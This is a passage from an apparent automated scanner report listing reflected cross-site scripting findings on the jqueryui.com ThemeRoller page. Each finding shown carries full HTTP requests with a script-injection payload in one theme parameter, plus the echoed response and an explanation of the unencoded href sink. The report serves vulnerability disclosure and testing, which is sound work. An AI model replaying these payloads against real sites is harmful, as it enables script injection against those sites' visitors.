rror=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 29 Jan 2011 05:00:11 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120002

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal9cc66"><script>alert(1)</script>b02328b292f&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&
...[SNIP]...

4.629. http://jqueryui.com/themeroller/ [iconColorActive parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorActive request parameter is copied, unencoded, into the double-quoted href attribute of the stylesheet <link> that loads /themeroller/css/parseTheme.css.php with the page's own query string appended. The payload 44097"><script>alert(1)</script>a09edf276e3 was submitted in the iconColorActive parameter and was echoed unmodified in the response; its leading "> closes the attribute and the tag, so the <script> element that follows is parsed in the document head.

This proof-of-concept shows that arbitrary JavaScript can be injected into the application's response. The sink is the same one reported for the other /themeroller/ parameters in this report.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=45454544097"><script>alert(1)</script>a09edf276e3&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 29 Jan 2011 05:05:04 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
r=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=45454544097"><script>alert(1)</script>a09edf276e3&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.pn
...[SNIP]...

4.630. http://jqueryui.com/themeroller/ [iconColorContent parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorContent request parameter is copied, unencoded, into the double-quoted href attribute of the stylesheet <link> that loads /themeroller/css/parseTheme.css.php with the page's own query string appended. The payload 836c3"><script>alert(1)</script>8b1747e34da was submitted in the iconColorContent parameter and was echoed unmodified in the response; its leading "> closes the attribute and the tag, so the <script> element that follows is parsed in the document head.

This proof-of-concept shows that arbitrary JavaScript can be injected into the application's response. The sink is the same one reported for the other /themeroller/ parameters in this report.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222836c3"><script>alert(1)</script>8b1747e34da&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 29 Jan 2011 05:01:55 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
derColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222836c3"><script>alert(1)</script>8b1747e34da&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpaci
...[SNIP]...

4.631. http://jqueryui.com/themeroller/ [iconColorDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorDefault request parameter is copied, unencoded, into the double-quoted href attribute of the stylesheet <link> that loads /themeroller/css/parseTheme.css.php with the page's own query string appended. The payload 7e8a4"><script>alert(1)</script>eb9f889d3a7 was submitted in the iconColorDefault parameter and was echoed unmodified in the response; its leading "> closes the attribute and the tag, so the <script> element that follows is parsed in the document head.

This proof-of-concept shows that arbitrary JavaScript can be injected into the application's response. The sink is the same one reported for the other /themeroller/ parameters in this report.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=8888887e8a4"><script>alert(1)</script>eb9f889d3a7&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 29 Jan 2011 05:03:14 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
olorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=8888887e8a4"><script>alert(1)</script>eb9f889d3a7&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=6
...[SNIP]...

4.632. http://jqueryui.com/themeroller/ [iconColorError parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorError request parameter is copied, unencoded, into the double-quoted href attribute of the stylesheet <link> that loads /themeroller/css/parseTheme.css.php with the page's own query string appended. The payload 7cff7"><script>alert(1)</script>b21e4745897 was submitted in the iconColorError parameter and was echoed unmodified in the response; its leading "> closes the attribute and the tag, so the <script> element that follows is parsed in the document head.

This proof-of-concept shows that arbitrary JavaScript can be injected into the application's response. The sink is the same one reported for the other /themeroller/ parameters in this report.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a7cff7"><script>alert(1)</script>b21e4745897&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 29 Jan 2011 05:06:08 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
orderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a7cff7"><script>alert(1)</script>b21e4745897&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&of
...[SNIP]...

4.633. http://jqueryui.com/themeroller/ [iconColorHeader parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorHeader request parameter is copied, unencoded, into the double-quoted href attribute of the stylesheet <link> that loads /themeroller/css/parseTheme.css.php with the page's own query string appended. The payload 4d3c3"><script>alert(1)</script>f3869e5e299 was submitted in the iconColorHeader parameter and was echoed unmodified in the response; its leading "> closes the attribute and the tag, so the <script> element that follows is parsed in the document head.

This proof-of-concept shows that arbitrary JavaScript can be injected into the application's response. The sink is the same one reported for the other /themeroller/ parameters in this report.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=2222224d3c3"><script>alert(1)</script>f3869e5e299&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 29 Jan 2011 05:00:51 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=2222224d3c3"><script>alert(1)</script>f3869e5e299&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOp
...[SNIP]...

4.634. http://jqueryui.com/themeroller/ [iconColorHighlight parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorHighlight request parameter is copied, unencoded, into the double-quoted href attribute of the stylesheet <link> that loads /themeroller/css/parseTheme.css.php with the page's own query string appended. The payload be373"><script>alert(1)</script>882164f26de was submitted in the iconColorHighlight parameter and was echoed unmodified in the response; its leading "> closes the attribute and the tag, so the <script> element that follows is parsed in the document head.

This proof-of-concept shows that arbitrary JavaScript can be injected into the application's response. The sink is the same one reported for the other /themeroller/ parameters in this report.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ffbe373"><script>alert(1)</script>882164f26de&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 29 Jan 2011 05:05:23 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
e=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ffbe373"><script>alert(1)</script>882164f26de&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay
...[SNIP]...

4.635. http://jqueryui.com/themeroller/ [iconColorHover parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorHover request parameter is copied, unencoded, into the double-quoted href attribute of the stylesheet <link> that loads /themeroller/css/parseTheme.css.php with the page's own query string appended. The payload a060e"><script>alert(1)</script>574464c1df9 was submitted in the iconColorHover parameter and was echoed unmodified in the response; its leading "> closes the attribute and the tag, so the <script> element that follows is parsed in the document head.

This proof-of-concept shows that arbitrary JavaScript can be injected into the application's response. The sink is the same one reported for the other /themeroller/ parameters in this report.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545a060e"><script>alert(1)</script>574464c1df9&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 29 Jan 2011 05:04:05 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
t=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545a060e"><script>alert(1)</script>574464c1df9&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpa
...[SNIP]...

4.636. http://jqueryui.com/themeroller/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The name of an arbitrarily supplied request parameter is copied, unencoded, into the double-quoted href attribute of the stylesheet <link> that loads /themeroller/css/parseTheme.css.php with the page's own query string appended. The payload adba1"><script>alert(1)</script>92436fbe461 was submitted as a parameter name (adba1"><script>alert(1)</script>92436fbe461=1) and was echoed unmodified in the response; its leading "> closes the attribute and the tag, so the <script> element that follows is parsed in the document head.

This proof-of-concept shows that arbitrary JavaScript can be injected into the application's response. Because a parameter the application does not even recognise is reflected, the page evidently appends the raw query string, names and values alike, to the href. Validating the known theme parameters one by one would therefore not close this issue; the string has to be allow-listed and output-encoded at the point where the href is built.

Request

GET /themeroller/?adba1"><script>alert(1)</script>92436fbe461=1 HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 29 Jan 2011 04:51:36 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 117121

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&adba1"><script>alert(1)</script>92436fbe461=1" type="text/css" media="all" />
...[SNIP]...

4.637. http://jqueryui.com/themeroller/ [offsetLeftShadow parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the offsetLeftShadow request parameter is copied, unencoded, into the double-quoted href attribute of the stylesheet <link> that loads /themeroller/css/parseTheme.css.php with the page's own query string appended. The payload c570e"><script>alert(1)</script>afcffadfccf was submitted in the offsetLeftShadow parameter and was echoed unmodified in the response; its leading "> closes the attribute and the tag, so the <script> element that follows is parsed in the document head.

This proof-of-concept shows that arbitrary JavaScript can be injected into the application's response. The sink is the same one reported for the other /themeroller/ parameters in this report.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8pxc570e"><script>alert(1)</script>afcffadfccf&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 29 Jan 2011 05:07:40 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8pxc570e"><script>alert(1)</script>afcffadfccf&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

4.638. http://jqueryui.com/themeroller/ [offsetTopShadow parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

